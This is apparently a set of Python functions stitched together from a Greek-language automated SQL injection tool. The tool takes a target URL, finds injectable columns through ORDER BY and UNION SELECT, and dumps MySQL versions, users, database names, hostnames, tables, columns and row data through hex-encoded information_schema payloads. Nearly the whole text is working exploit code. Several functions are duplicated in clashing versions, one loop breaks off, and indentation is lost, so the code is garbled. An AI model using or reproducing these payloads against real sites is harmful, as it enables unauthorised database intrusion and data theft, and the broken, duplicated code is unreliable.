def loc_db_files(site):
site = site.replace("@@datadir","unhex(hex(group_concat(0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,schema_name,0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e)))")
site = site.replace("--","+from+information_schema.schemata--")
the_page = get_the_page(site,"2")
directory = s_data.search_for(the_page)
print directory
return(directory)
def host_name(site):
site = site.replace("@@hostname","unhex(hex(group_concat(0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,schema_name,0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e)))")
site = site.replace("--","+from+information_schema.schemata--")
the_page = get_the_page(site,"2")
host_name = s_data.search_for(the_page)
print host_name
return(host_name)
def names(site):
site = site.replace("@@version","unhex(hex(group_concat(0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,schema_name,0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e)))")
site = site.replace("--","+from+information_schema.schemata--")
the_page = get_the_page(site,"2")
db_names = s_data.search_for(the_page)
print_cols_tables(db_names,'Databases')
return(db_names)
def user(site):
site = site.replace(
"@@version",
"unhex(hex(group_concat(0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,user(),0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e)))"
)
the_page = get_the_page(site, "2")
user = s_data.search_for(the_page)
return user[0]
def working_db(site):
site = site.replace(
"@@version",
"unhex(hex(group_concat(0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,database(),0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e)))"
)
the_page = get_the_page(site, "2")
db = s_data.search_for(the_page)
return db[0]
def names(site):
site = site.replace(
"@@version",
"unhex(hex(group_concat(0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,schema_name,0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e)))"
)
site = site.replace("--", "+from+information_schema.schemata--")
the_page = get_the_page(site, "2")
db_names = s_data.search_for(the_page)
return (db_names)
def loc_db_files(site):
site = site.replace(
"@@datadir",
"unhex(hex(group_concat(0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,schema_name,0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e)))"
)
site = site.replace("--", "+from+information_schema.schemata--")
the_page = get_the_page(site, "2")
directory = s_data.search_for(the_page)
print directory
return (directory)
def host_name(site):
site = site.replace(
"@@hostname",
"unhex(hex(group_concat(0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,schema_name,0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e)))"
)
site = site.replace("--", "+from+information_schema.schemata--")
the_page = get_the_page(site, "2")
host_name = s_data.search_for(the_page)
print host_name
return (host_name)
def search_in_columns(site, table, based):
site = site + table + "--" + based
the_page = get_the_page(site, "2")
columns_found = s_data.search_for(the_page)
total_cols = len(columns_found)
if total_cols:
print_data(columns_found, ['Columns Found'])
back_table = table
table = table.encode()
table = binascii.unhexlify(table)
table = table.decode()
site = site.replace(
"+FROM+information_schema.columns+WHERE+table_name=0x" +
back_table + "--", "+AS/**/details/**/FROM/**/" + table + "--")
columns = input("Give the columns: ")
selected_columns = []
for column in columns_found:
if column in columns:
selected_columns.append(column)
site = site.replace("column_name", "%s,/**/" % selected_columns[0])
for i in range(1, len(selected_columns)):
site = site.replace(
",/**/,0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e,",
",0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e,0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,%s,/**/,0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e,"
% selected_columns[i])
site = site.replace(",/**/", '')
site = site.replace(",0x3e0x0a", ",0x3e,0x0a")
the_page = get_the_page(site, "2")
total_data = []
total_data = s_data.search_for(the_page)
if not len(total_data):
print("No data found!")
else:
print_data(total_data, selected_columns)
def working_db(site):
site = site.replace("@@version","unhex(hex(group_concat(0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,database(),0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e)))")
the_page = get_the_page(site,"2")
db = s_data.search_for(the_page)
print "You are on: %s database" %db[0]
ans = raw_input("Do you want to change the database?(y/n): ")
while ans!='Y' and ans!='y' and ans!='n' and ans!='N':
ans = raw_input("Do you want to change the database?(y/n): ")
if ans=='n' or ans=='N':
return(db[0])
else:
return('1')
def find_tables_of_database(self):
self.the_page = get_the_page(self.site, "2")
self.tables = s_data.search_for(self.the_page)
if not len(self.tables):
print("Could not get the tables, program will exit.")
exit()
print_data(self.tables, ['Tables Found'])
self.site = replaces.repl(self.site, 3, self.working_on_db)
if not self.based == '':
self.site = site.replace(self.based, '')
def search_in_columns(site, table, based, database):
site = site + table + "--" + based
the_page = get_the_page(site, "2")
columns_found = s_data.search_for(the_page)
total_cols = len(columns_found)
if total_cols:
print_cols_tables(columns_found, 'Columns Found')
table = table.decode("hex")
site = site.replace(
"information_schema.columns+WHERE+table_name=0x" +
table.encode("hex") + "--", database + '.' + table + "--")
columns = raw_input("Give the columns: ")
selected_columns = []
for column in columns_found:
if column in columns:
selected_columns.append(column)
site = site.replace("column_name", "%s,/**/" % selected_columns[0])
for i in range(1, len(selected_columns)):
site = site.replace(
",/**/,0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e,",
",0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e,0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,%s,/**/,0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e,"
% selected_columns[i])
site = site.replace(",/**/", '')
site = site.replace(",0x3e0x0a", ",0x3e,0x0a")
the_page = get_the_page(site, "2")
total_data = []
total_data = s_data.search_for(the_page)
if not len(total_data):
print "No data found!"
else:
print_data(total_data, selected_columns, table)
site=replaces.repl(site,1,vuln_column)
dbs.version(site)
dbs.user(site)
dbs_names=dbs.names(site)
ans=dbs.working_db(site)
if ans=='1':
ans=raw_input("On which Database you want to work on?: ")
while ans not in dbs_names:
ans=raw_input("Wrong Input!\nOn which Database you want to work on?: ")
site=replaces.repl(site,2,ans)
the_page=get_the_page(site,"2")
tables=s_data.search_for(the_page)
if len(tables)==0:
print "Could not get the tables, program will exit."
exit()
print_cols_tables(tables,'Tables Found')
site=replaces.repl(site,3,ans)
site=site.replace(based,'')
flag = 1
site1 = site
while flag==1:
print "Give the table: "
table_choose=raw_input(">>> ")
while not(table_choose in tables):
print "Wrong input. Give the table: "
def union_normal(self):
versions = ["5.1.41","5.1.61","5.0.96","5.1.66","5.1.56"]
check = 3
flag='1'
while flag=='1':
a=1
site=raw_input("Give the url: ")
site=site_alive(site)
if site=="-1":
print "No response from server"
print "Program will exit"
exit()
flag=vuln(site)
if flag=="-1":
exit()
site1=site
site1=site1+"+OrDER+By+"
columns=ft_cols(site,site1)
if columns==-1:
exit()
site1=site1.replace("+OrDER+By+","")
num_columns="1"
for i in range (2,columns+1):
if i==(columns+1):
num_columns=num_columns+str(i)
else:
num_columns=num_columns+","+str(i)
site=site1+"+UNION+SELECT+%s--" %num_columns
site=site.replace("'","")
site=site.replace(flag,flag+"-")
vuln_column=1
flag=1
the_page = get_the_page(site)
while flag==1:
if (">"+str(vuln_column)+"<") in the_page:
flag=0
else:
vuln_column=vuln_column+1
if vuln_column>columns:
flag=2
if flag==2:
print "Den uparxoun vulnerable columns"
print "Program will exit"
exit()
vuln_column=str(vuln_column)
site=site.replace(",%s" %vuln_column,",@@version",1)
the_page=get_the_page(site)
flag=1
index=0
while index<len(versions):
if versions[index] in the_page:
print "SQL Version: %s" %versions[index]
index=len(versions)+1
else:
index=index+1
if flag==1:
if ("5.0" in the_page) or ("5.1" in the_page):
flag=0
if flag==1:
print "Could not get the DB version."
print "Program will exit"
exit()
site=site.replace("@@version","unhex(hex(group_concat(0x3a,0x3a,table_name,0x3a,0x3a,0x0a)))")
site=site.replace("--","+FROM+information_schema.tables+WHERE+table_schema=database()--")
the_page=get_the_page(site)
tables=s_data.search_for(the_page)
print "Tables found %d" %len(tables)
print tables
site=site.replace("table_name","column_name")
site=site.replace("+FROM+information_schema.tables+WHERE+table_schema=database()--","+FROM+information_schema.columns+WHERE+table_name=0x")
flag=1
site1=site
while flag==1:
print "Give the table: "
table1=raw_input(">>>")
while not(table1 in tables):
print "Wrong input. Give the table: "
table1=raw_input(">>>")
table1=table1.encode("hex")
site=site1+table1+"--"
the_page=get_the_page(site)
columns_found=s_data.search_for(the_page)
if len(columns_found)==0:
print "No columns found. Do you want to try an other table? (y/n)"
ans=raw_input(">>>")
while not(ans=='y' or ans=='n' or ans=='Y' or ans=='N'):
print "No columns found. Do you want to try an other table? (y/n)"
ans=raw_input(">>>")
if ans=='N' or ans=='n':
print 'Program will Exit'
exit()
else:
flag=1
elif flag==1:
print "Columns Found %d" %len(columns_found)
print "="*80
print columns_found
print "="*80
k=0
ks=[]
table_choose=table1.decode("hex")
site=site.replace("information_schema.columns+WHERE+table_name=0x"+table1+"--",table_choose+"--")
tal_cols=len(columns_found)
while tal_cols>0:
col_choose=raw_input("Dose ena column (0 gia na mhn dwseis kanena allo): ")
while not(col_choose in columns_found) and not(col_choose=='0'):
col_choose=raw_input("Dose ena column (0 gia na mhn dwseis kanena allo): ")
if col_choose=="0":
tal_cols=0
site=site.replace(",/**/","")
else:
if tal_cols==len(columns_found):
site=site.replace("column_name","%s,/**/" %col_choose)
tal_cols=tal_cols-1
k=1
ks.append(col_choose)
else:
site=site.replace(",/**/",",0x3a,0x3a,%s,/**/"%col_choose)
tal_cols=tal_cols-1
if tal_cols==0:
site=site.replace(",/**/",'')
ks.append(col_choose)
k=k+1
the_page=get_the_page(site)
length=len(the_page)
if k%2==1:
total_data=s_data.search_for(the_page)
else:
total_data=s_data.search_for_2(the_page,k)
length=len(total_data)
l=0
for i in range (0,length,k):
j=0
while j<k:
if j+1==k:
print ks[j],":",total_data[l],"|"
j=j+1
l=l+1
else:
print ks[j],":",total_data[l],"|",
j=j+1
l=l+1
ans=raw_input("8es na deis gia allo table? (y/n): ")
while not (ans=='y' or ans=='Y' or ans=='n' or ans=='N'):
ans=raw_input("8es na deis gia allo table? (y/n): ")
if ans=='y' or ans=='Y':
flag=1
else:
flag=0
def user(site):
site = site.replace("@@version","unhex(hex(group_concat(0x3c,0x74,0x61,0x62,0x6c,0x65,0x20,0x73,0x74,0x79,0x6c,0x65,0x3d,0x22,0x77,0x69,0x64,0x74,0x68,0x3a,0x32,0x39,0x25,0x22,0x3e,user(),0x3c,0x2f,0x74,0x61,0x62,0x6c,0x65,0x3e)))")
the_page = get_the_page(site,"2")
user = s_data.search_for(the_page)
print "Current user is: %s" %user[0]